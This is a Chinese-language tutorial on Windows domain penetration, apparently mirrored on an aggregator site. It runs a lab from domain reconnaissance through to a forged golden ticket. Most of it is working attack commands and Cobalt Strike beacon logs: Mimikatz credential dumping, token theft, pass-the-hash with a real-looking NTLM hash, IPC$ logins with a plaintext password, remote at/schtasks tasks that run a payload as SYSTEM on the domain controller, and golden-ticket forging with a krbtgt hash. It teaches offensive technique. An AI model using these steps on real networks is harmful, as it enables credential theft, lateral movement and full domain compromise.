【内网渗透】内网渗透学习之域渗透常规方法

news2024/12/24 21:50:39

域渗透常规方法和思路

    • 1、域内信息收集
      • 1.1、获取当前用户信息
        • 1.1.1、获取当前用户与域 SID
        • 1.1.2、查询指定用户的详细信息
      • 1.2、判断是否存在域
      • 1.2、查询域内所有计算机
      • 1.3、查询域内所有用户组列表
      • 1.4、查询所有域成员计算机列表
      • 1.5、获取域密码信息
      • 1.6、获取域信任信息
      • 1.7、查找域控制器
        • 1.7.1、判断用户是否在域
        • 1.7.2、查看域控制器的机器名
        • 1.7.3、查看域控制的主机名
        • 1.7.4、查看域控 IP
        • 1.7.5、查看域控制的主机名
        • 1.7.6、查看域控制器组
      • 1.8、查询当前域内存活主机
    • 2、判断本地管理员
    • 3、运行 Mimikatz读取密码
    • 4、登录认证
      • 4.1、Access Token 登录令牌
      • 4.2、散列认证
      • 4.3、IPC 连接
      • 4.4、黄金票据(Golden Ticket)

1、域内信息收集

1.1、获取当前用户信息

1.1.1、获取当前用户与域 SID

whoami /all

在这里插入图片描述

1.1.2、查询指定用户的详细信息
# 查询本地用户详细信息
net user user01


# 查询域用户详细信息
net user tester01 /domain

在这里插入图片描述

在这里插入图片描述

1.2、判断是否存在域

ipconfig /all
systeminfo

在这里插入图片描述
在这里插入图片描述

net view /domain

在这里插入图片描述

  • 若是此命令在显示域处显示 WORKGROUP,则不存在域;
  • 若是报错:发生系统错误 5,则存在域,但该用户不是域用户
net config workstation

在这里插入图片描述

net localgroup administrators 查看本机管理员(通常会包含有域用户)

1.2、查询域内所有计算机

net view /domain:xxx
在这里插入图片描述

1.3、查询域内所有用户组列表

net group /domain
在这里插入图片描述

1.4、查询所有域成员计算机列表

net group "domain computers" /domain

在这里插入图片描述

1.5、获取域密码信息

可以获取域密码策略设置、长短、错误锁定等信息

net accounts /domain
在这里插入图片描述

1.6、获取域信任信息

nltest /domain_trusts
在这里插入图片描述

1.7、查找域控制器

1.7.1、判断用户是否在域

net time /domain
域存在且用户在域内
在这里插入图片描述
存在域,当前用户不是域用户
在这里插入图片描述
当前网络环境为工作组,不存在域
在这里插入图片描述

1.7.2、查看域控制器的机器名

nltest /dclist:god在这里插入图片描述

1.7.3、查看域控制的主机名

nslookup -type=SRV _ldap._tcp
在这里插入图片描述

1.7.4、查看域控 IP

ping DC.test.lab
在这里插入图片描述

nslookup dc
在这里插入图片描述
判断域控制器和DNS 服务器是否在同一服务器上
nslookup test.lab
在这里插入图片描述

1.7.5、查看域控制的主机名

nslookup -type=SRV _ldap._tcp
在这里插入图片描述

1.7.6、查看域控制器组

net group "domain controllers" /domain
在这里插入图片描述

实际网络中,一个域内一般存在两台或两台以上的域控制器,作为主备。

netdom query pdc

netdom不是系统自带工具,需要下载安装

1.8、查询当前域内存活主机

利用 windows 内置命令收集

net group "domain computers" /domain
在这里插入图片描述
利用NetBIOS 探测内网
nbtscan 192.168.52.0/24
在这里插入图片描述

2、判断本地管理员

net localgroup "administrators"
在这里插入图片描述

3、运行 Mimikatz读取密码

在这里插入图片描述
在这里插入图片描述

4、登录认证

4.1、Access Token 登录令牌

Access Token : 保存了当前用户的权限信息,每个进程可能使用不同用户的身份启动,有不同的Access Token。如果我们想以域用户的身份做操作,这个时候就可以获得本地域用户身份的进程,然后进行token窃取。

以下是令牌窃取的过程:

  1. 使用 ps 列出进程
  2. 使用 steal_token [pid] 窃取令牌
  3. 使用 getuid 找到你是谁
  4. 使用 rev2self移除令牌

方法1:偷取token

到进程中偷取token:
在这里插入图片描述
右键要横向的主机,选择psexec64:
在这里插入图片描述
选择一个已经获得的凭据或者勾选使用当前令牌,并选择监听器与会话即可:
在这里插入图片描述

当密码输入错误时,执行上面的两个命令就会提示 登录失败: 未知的用户名或错误密码。 同样的使用 rev2self 可除去当前令牌,恢复原来的SYSTEM 权限

方法2:制作token
查看当前用户身份信息是否本地域用户,如不是则需要获取本地域用户的进程:

steal_token 2116

使用命令make_token domain\user password伪造一个token:
在这里插入图片描述
查看一下当前会话 uid

在这里插入图片描述

访问dc的默认共享:
在这里插入图片描述

4.2、散列认证

  • mimikatz 使用登录令牌开启了一个进程,在单点登录信息那里填入我们提供的用户名称、域、密码哈希值
  • cobalt strike自动的从那个进程中窃取令牌并关闭

复制ntm哈希
在这里插入图片描述
pth 命令获取信任
pth GOD\Administrator f76d5be6348a96263e8bcb0f49552fbb
在这里插入图片描述
在这里插入图片描述

最后使用命令移除当前窃取的令牌

rev2self

4.3、IPC 连接

IPC ( Internet Process Connection)共享“命名管道”的资源,是为了实现进程间通信而开放的命名管道。IPC可以通过验证用户名和密码获得相应的权限,通常在远程管理计算机和查看计算机的共享资源时使用。
通过 ipc$,可以与目标机器建立连接。利用这个连接,不仅可以访问目标机器中的文件,进行上传、下载等操作,还可以在目标机器上运行其他命令,以获取目标机器的目录结构、用户列表等信息。

  • 利用条件:

    • 开启了139、445端口;
    • 管理员开启了默认共享;
  • 连接失败原因:

    • 用户名密码错误。
    • 目标没有打开ipc$默认共享。
    • 不能成功连接目标的139、445端口
    • 命令输入错误。

建立一个ipc$
前提需要获取到账号密码,需要使用logonpasswords读取
在这里插入图片描述

shell net use \\192.168.52.138\ipc$ "xiaoc@123" /user:administrator
在这里插入图片描述
在使用net use 命令与远程目标机器建立ipc$后,可以使用dir 命令列出远程主机中的文件。

shell dir \\192.168.52.138\c$
在这里插入图片描述
在使用net use 命令与远程目标机器建立ipc$后,可以未使用tasklist命令的/S参数列出远程主机上运行的进程。

使用net time命令确定远程机器当前的系统时间。
在这里插入图片描述

shell tasklist /S 192.168.52.138
在这里插入图片描述

添加计划任务

at是Windows自带的用于创建计时任务的命令,它主要工作在Windows Server 2008
之前版本的操作系统中。使用at命令在远程目标机器上创建计划任务的流程大致如下 因为当前域控服务器使用的是server2008

复制远程文件到目标服务器上(域控服务器,假设可以出网)
shell copy C:\Users\Administrator\Desktop\testartifact_x86.exe \\192.168.52.138\c$
在这里插入图片描述
在这里插入图片描述
使用at命令添加定时执行payload文件
shell at \\192.168.52.138 9:22:00 c:\testartifact_x86.exe
在这里插入图片描述
执行成功
在这里插入图片描述
删除使用at 命令创建计划任务的记录。
shell at \\10.1.1.2 2 /del

Windows Vista、Windows Server 2008 及之后版本的操作系统已经将at命令废弃了。于是,攻击者开始使用schtasks命令代替at命令。schtasks命令比 at命令更为灵活、自由。

shell schtasks /create /s 10.1.1.2 /tn test /sc onstart /tr c:\test_msf_local.exe /ru system /f
这条命令的解释是在IP 为10.1.1.2主机上创建一个开启自启动的定时任务,定时任务名称为test,以system 的权限执test_msf_local.exe。若定时任务存在,则发出警告。如果未与目标主机建立IPC连接,需要输入用户名和密码的参数,在末尾追加:/u administrator /p “密码”。

在使用schtasks命令时,会在系统中留下日志文件C:\Windows\Tasks\SchedLgU.txt。如果执行schtasks命令后没有回显,可以配合ipc$执行文件,使用type命令远程查看执行结果。

删除任务
schtasks /delete /s 10.1.1.2 /tn "test" /f

删除ipc$连接

  • net use \\目标ip /del /y

  • 在使用schtasks命令时,会在系统中留下日志文件C:\Windows\Tasks\SchedLgU.txt。如果执行schtasks命令后没有回显,可以配合ipc$执行文件,使用type命令远程查看执行结果。

4.4、黄金票据(Golden Ticket)

获取用户名、域名、域的SID值

# 获取当前域
[07/10 10:43:39] beacon> shell net view /domain
[07/10 10:43:39] [*] Tasked beacon to run: net view /domain
[07/10 10:43:40] [+] host called home, sent: 47 bytes
[07/10 10:43:53] [+] received output:
Domain

-------------------------------------------------------------------------------
GOD                  
命令成功完成。

# 获取域内用户
[07/10 10:44:17] beacon> shell net view /domain:god
[07/10 10:44:17] [*] Tasked beacon to run: net view /domain:god
[07/10 10:44:17] [+] host called home, sent: 51 bytes
[07/10 10:44:43] [+] received output:
服务器名称            注解

-------------------------------------------------------------------------------
\\OWA                                                                          
\\ROOT-TVI862UBEH                                                              
命令成功完成。


[07/10 10:45:02] beacon> shell whoami /user
[07/10 10:45:02] [*] Tasked beacon to run: whoami /user
[07/10 10:45:02] [+] host called home, sent: 43 bytes
[07/10 10:45:02] [+] received output:

用户信息
----------------

用户名            SID                                          
================= =============================================
god\administrator S-1-5-21-2952760202-1353902439-2381784089-500
#域的 SID 值即安全标识符 Security Identifiers,使用 whoami /user 命令可查看,注意不需要 SID 最后的一组数字
#SID 就是S-1-5-21-2952760202-1353902439-2381784089

获取DC 中 KRBTGT 用户的 NTLM 哈希

DC 中 KRBTGT 用户的 NTLM 哈希可以通过 dcsync 或 hashdump 获得,也可以使用powershell加载mimikatz获取

OWA\krbtgt 58e91a5ac358d86513ab224312314061

在这里插入图片描述

右击会话,生成黄金票据
在这里插入图片描述

注意: Domain 需要填写成 FQDN 格式,即完全合格域名 Fully Qualified Domain Name ,也就是类似于
teamssix.com 的格式

[07/10 10:57:38] beacon> mimikatz kerberos::golden /user:administrator /domain:god.cm /sid:S-1-5-21-2952760202-1353902439-2381784089 /krbtgt:58e91a5ac358d86513ab224312314061 /endin:480 /renewmax:10080 /ptt
[07/10 10:57:38] [*] Tasked beacon to run mimikatz's kerberos::golden /user:administrator /domain:god.cm /sid:S-1-5-21-2952760202-1353902439-2381784089 /krbtgt:58e91a5ac358d86513ab224312314061 /endin:480 /renewmax:10080 /ptt command
[07/10 10:57:38] [+] host called home, sent: 313667 bytes
[07/10 10:57:40] [+] received output:
User      : administrator
Domain    : god.cm (GOD)
SID       : S-1-5-21-2952760202-1353902439-2381784089
User Id   : 500
Groups Id : *513 512 520 518 519 
ServiceKey: 58e91a5ac358d86513ab224312314061 - rc4_hmac_nt      
Lifetime  : 2024/7/10 10:57:38 ; 2024/7/10 18:57:38 ; 2024/7/17 10:57:38
-> Ticket : ** Pass The Ticket **

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Golden ticket for 'administrator @ god.cm' successfully submitted for current session

建立好黄金票据之后内可以使用命令判断当前权限(票据存在生存时间过期失效)

shell dir \\DC\C$

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1927971.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

STM32智能环境监测系统教程

目录 引言环境准备智能环境监测系统基础代码实现:实现智能环境监测系统 4.1 数据采集模块 4.2 数据处理与控制模块 4.3 通信与网络系统实现 4.4 用户界面与数据可视化应用场景:环境监测与管理问题解决方案与优化收尾与总结 1. 引言 智能环境监测系统通…

Redis的配置优化、数据类型、消息队列

文章目录 一、Redis的配置优化redis主要配置项CONFIG 动态修改配置慢查询持久化RDB模式AOF模式 Redis多实例Redis命令相关 二、Redis数据类型字符串string列表list集合 set有序集合sorted set哈希hash 三、消息队列生产者消费者模式发布者订阅者模式 一、Redis的配置优化 redi…

OSI 七层模型与五层模型

OSI(开放系统互连)七层模型和五层模型是描述计算机网络协议的两种不同层次划分方法。两者用于帮助理解和设计网络协议,但它们在层次划分上有所不同。

手机数据恢复:适用于 Android 的 4 大数据恢复应用程序

没有人希望丢失设备上的重要数据。如果发生这种情况,请不要惊慌。以下是可帮助您恢复丢失或删除的数据的 Android 数据恢复应用程序列表。 有多种方法可以恢复已删除或丢失的 Android 数据,最简单、最快捷的方法是使用第三方恢复应用程序。这些应用程序会…

Redis 中String类型操作命令(命令演示,时间复杂度,返回值,注意事项)

String 类型 文章目录 String 类型set 命令get 命令mset 命令mget 命令get 和 mget 的区别incr 命令incrby 命令decr 命令decrby 命令incrbyfloat 命令append 命令getrange 命令setrange 命令 字符串类型是 Redis 中最基础的数据类型,在讲解命令之前,我们…

新增支持GIS地图、数据模型引擎升级、增强数据分析处理能力

为了帮助企业提升数据分析处理能力,Smartbi重点围绕产品易用性、用户体验、操作便捷性进行了更新迭代,同时重磅更新了体验中心。用更加匹配项目及业务需求的Smartbi,帮助企业真正发挥数据的价值,赋能决策经营与管理。 Smartbi用户…

昇思25天学习打卡营第7天 | 基于MindSpore的GPT2文本摘要

本次打卡基于gpt2的文本摘要 数据加载及预处理 from mindnlp.utils import http_get# download dataset url https://download.mindspore.cn/toolkits/mindnlp/dataset/text_generation/nlpcc2017/train_with_summ.txt path http_get(url, ./)from mindspore.dataset impor…

比华为、特斯拉更大的野心

作者 | 艾泊宇 最近百度自动驾驶的网约车萝卜快跑在武汉大规模上路了。 同样是做自动驾驶,你看百度、华为、特斯拉,他们三家的思路完全不同。 但是可以看出来,各自完全不同的用意和意图,以及格局的高低。 华为很稳,…

BernNet Learning Arbitrary Graph Spectral Filters via Bernstein Approximation

发表于:neurips21 推荐指数: #paper/⭐⭐ 设定:在本文中,h是过滤器. bernstein 多项式逼近(这个证明有点稀里糊涂的,反正我觉得一点点问题,可能因为我水平低) p K ( t ) : ∑ k 0 K θ k ⋅ b k K ( t ) ∑ k 0 K f ( k K ) ⋅ ( K k ) ( 1 − t ) K − k t k . p_K(t):…

太牛了!从来没想到加密软件这么好用

还在为无法保证重要信息安全烦恼吗?金刚钻信息网站,一个集数据防泄密系统、企业数据云盘存储为一身的多个安全产品网站,为企业文件保驾护航! 一、全方位防护,无懈可击 数据防泄密系统从电脑内部,电脑外部多…

AV1 编码标准熵编码技术概述

AV1熵编码 AV1编码技术是一种开源的视频编解码标准,由开放媒体联盟(AOMedia)开发,旨在提供高效的视频压缩,同时避免复杂的专利授权问题。在熵编码方面,AV1采用了一种多符号上下文自适应算术编码技术&#x…

EMR 集群时钟同步问题及解决方案An error occurred (InvalidSignatureException)

目录 1. 问题描述2. 问题原因3. 解决过程4. 时钟同步的重要性5. Linux 系统中的时钟同步方式6. 检查 Linux 系统时钟同步状态7. EMR 集群中的时钟同步配置8. 时钟同步对大数据组件的影响9. 监控和告警策略10. 故障排除和最佳实践11. 自动化时钟同步管理12. 时钟同步与数据一致性…

每日复盘-20240715

20240715 六日涨幅最大: ------1--------300807--------- 天迈科技 五日涨幅最大: ------1--------300807--------- 天迈科技 四日涨幅最大: ------1--------300807--------- 天迈科技 三日涨幅最大: ------1--------300713--------- 英可瑞 二日涨幅最大: ------1--------3007…

AV1技术学习:Translational Motion Compensation

编码块根据运动矢量在参考帧中找到相应的预测块,如下图所示,当前块的左上角的位置为(x0, y0),在参考帧中找到同样位置(x0, y0)的块,根据运动矢量移动到目标参考块(左上角位置为:(x1, y1))。 AV1…

【java】力扣 买卖股票的最佳时机 动态规划

文章目录 题目链接题目描述思路代码 题目链接 121.买卖股票的最佳时机 题目描述 思路 本题主要用到了动态规划 1.先定义dp数组的含义 先定义一个二维数组dp 然后dp[i][0]来表示第i天持有股票的现金 dp[i][1]代表第i天不持有股票的现金 刚开始的现金为0,当第i天买…

mysql索引值

mysql 索引值生成规则 MySQL索引值是如何生成的取决于具体的数据类型和列的具体定义。对于大多数数据类型,MySQL会为索引键值使用原始的数据。对于字符串类型(如VARCHAR, CHAR, TEXT),索引键值可能是字符串的前缀,这是…

二.1 信息存储(1.1-1.3)

大多数计算机使用8位的块,或者字节(byte),作为最小的可寻址的内存单位,而不是访问内存中单独的位。机器级程序将内存视为一个非常大的字节数组,称为虚拟内存(virtual memory)。内存的…

Home Assistant在windows环境安装

Home Assistant是什么? Home Assistant 是一个开源的智能家居平台,旨在通过集成各种智能设备和服务,提供一个统一的、可自定义的家庭自动化解决方案。它可以允许用户监控、控制和自动化家中的各种设备,包括灯光、温度、安全系统、…

C语言学生成绩管理系统源程序+设计报告

资料下载地址:C语言学生成绩管理系统源程序设计报告 目录 1.设计目的与要求 2.系统需求分析 3.总体设计 4、运行界面 5、资料清单 1.设计目的与要求 设计目的:学生成绩管理系统是为了在这个信息时代高速发展的今天,通过计算机取代传统…

Python从0到100(三十九):数据提取之正则(文末免费送书)

前言: 零基础学Python:Python从0到100最新最全教程。 想做这件事情很久了,这次我更新了自己所写过的所有博客,汇集成了Python从0到100,共一百节课,帮助大家一个月时间里从零基础到学习Python基础语法、Pyth…